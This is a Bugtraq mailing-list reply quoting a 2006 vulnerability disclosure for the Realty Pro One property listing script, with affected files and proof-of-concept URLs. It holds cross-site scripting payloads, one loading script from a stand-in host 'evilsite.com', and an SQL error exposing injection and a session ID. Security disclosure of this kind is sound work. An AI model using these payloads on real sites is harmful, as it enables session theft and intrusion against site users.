<<< Date Index >>>     <<< Thread Index >>>

RE: Realty Pro One Property Listing Script



Isn't the SQL injection vulnerability a bit more critical here? 

-----Original Message-----
From: luny@xxxxxxxxxxxxxxx [mailto:luny@xxxxxxxxxxxxxxx] 
Sent: Tuesday, May 23, 2006 7:39 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Realty Pro One Property Listing Script

Realty Pro One

http://realtypro1.2run2.com/index.php


Description:

Realty Pro One is a powerful property listing tool with many features.


Effected files:

searchlookup.php

images.php

index_other.php

request_info.php

?listingid


Exploits & Vulns:


XSS Vulnerability by the listingid variable:


http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite
.com/xss.js></SCRIPT>


Also outputs SQL Query error msg:


You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near 'This is
remote text via xss.js located at
evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re



More XSS Vulnerabilities:


http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS]

http://www.example.com/images.php?id=[XSS]

http://www.example.com/listings/index_other.php?listingid=[XSS]


By putting "> and <" infront and behind our script tags:


http://www.example.com/listings/request_info.php?agentid=101005";>[XSS]<"
&listtype=homes&listingid=222003


No version # for this script was given on the website.